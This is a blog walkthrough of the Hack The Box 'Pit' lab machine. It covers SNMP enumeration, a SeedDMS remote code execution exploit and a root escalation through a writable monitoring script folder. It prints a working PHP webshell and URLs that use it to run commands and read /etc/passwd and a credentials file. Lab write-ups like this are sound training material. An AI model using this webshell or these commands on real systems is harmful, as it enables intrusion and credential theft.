CTF Walkthroughs, Hack The Box

Hack The Box – Pit Walkthrough

September 29, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an intermediate Linux machine that required to enumerate SNMP in order to find and exploit a vulnerable SeedDMS instance to gain initial access and to exploit a misconfigured Bash script to elevate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified three open ports: port 22 (SSH), port 80 (HTTP) and port 9090 (HTTP).

When performing a UDP scan using the -sU flag, SNMP is also found:

The next step will be to start enumerating HTTP and SNMP.

Enumerating HTTP

The following page is displayed when accessing the site hosted on port 80:

Whereas the CentOS web login page is displayed on port 9090:

System credentials are normally used to authenticate into this, so at the moment it isn’t particularly useful.

When inspecting the certificate used for the site, a “dms-pit.htb” domain is revealed:

Adding the entry to the /etc/hosts file:

Unfortunately when navigating to it a 403 error comes up:

Enumerating SNMP

Enumerating all SNMP object identifiers using SNMPWalk:

snmpwalk -v2c -c public 10.10.10.241 .1

An interesting entry pointing at /var/www/html/seeddms51x/seeddms can be found:

When accessing the dms-pit.htb domain and adding /seeddms51x/seeddms/ to the URL, SeedDMS a document management system base on PHP can be accessed:

As well as one pointing to /usr/bin/monitor, which isn’t an usual binary:

Upon visiting the SNMP section of HackTricks, it recommends installing SNMP MIBS Downloader to see what the various SNMP object identifiers are and to use SNMPWalk with the NET-SNMP-EXTEND-MIB::nsExtendOutputFull query to enumerate the target system further:

https://book.hacktricks.xyz/pentesting/pentesting-snmp

Installing the tool:

Using the command mentioned above to find out more information about the system:

snmpwalk -v 1 -c public 10.10.10.241 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

This has revealed an unusual “michelle” user, which when used to authenticate to SeedDMS with a password of “michelle”, grants access to the site:

Exploiting SeedDMS Remote Code Execution

When looking for known vulnerabilities affecting SeedDMS, a RCE exploit can be found:

Mirroring the exploit locally:

Remote code execution can simply be obtained by executing a PHP backdoor and calling it through the /data/ /1048576/”document_id”/1.php endpoint:

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

Creating the simple PHP remote code execution shell locally:

The Michelle user only had access to their folder, which is under Docs–>Users–>Michelle.

Navigating to the Docs folder:

Navigating to the Users folder:

Navigating to the Michelle folder:

Clicking on the “Add document” button:

Adding a new document, attaching the PHP backdoor:

The document was successfully created:

The id generated for it is 30:

Remote cod execution can then be obtained by navigating to it and sending commands in the “cmd” GET parameter:


http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=whoami

After further testing, it appears the target box was not allowed to connect to the local Kali machine, therefore a reverse shell could not be established.

Authenticating to CentOS Web Login

When viewing the SeedDMSS documentation, it appears database credentials are stored in conf/settings.xml:
https://thejsdeveloper.wordpress.com/2019/07/31/installation-of-seed-dms/

By using the remote code execution vulnerability exploited above, credentials for the “seeddms” MySQL user can be found:

http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/var/www/html/seeddms51x/conf/settings.xml

Since the CentOS web login on port 9090 allows to authenticate with Linux credentials, an attempt to login as Michelle with the password found above can be made:

This was successful, granting access to the CentOS panel:

The application has a terminal functionality with allows to interact with the system through a BASH shell:

Privilege Escalation

When looking at the /usr/bin/monitor entry found earlier through SNMP enumeration, it appears the script executes files called check*sh under /usr/local/monitoring:

It appears that the current user has write access to this folder, so if a malicious script that matches the name mentioned above is created, it should be executed by /usr/bin/monitor.

Generating SSH keys:

Creating a check.sh script in /usr/local/monitoring/ that will add the public key generated above to the authorized keys of the Root user:

Running the following command to walk through SNMP, which will execute /usr/bin/monitor script:

snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241

Logging in as Root via SSH using the private key generated above:

Conclusion

This was a really fun machine, as SNMP isn’t a very common protocol when it comes to penetration testing so it was great to see how it can be enumerated to find very sensitive information that can be leveraged for subsequent attacks.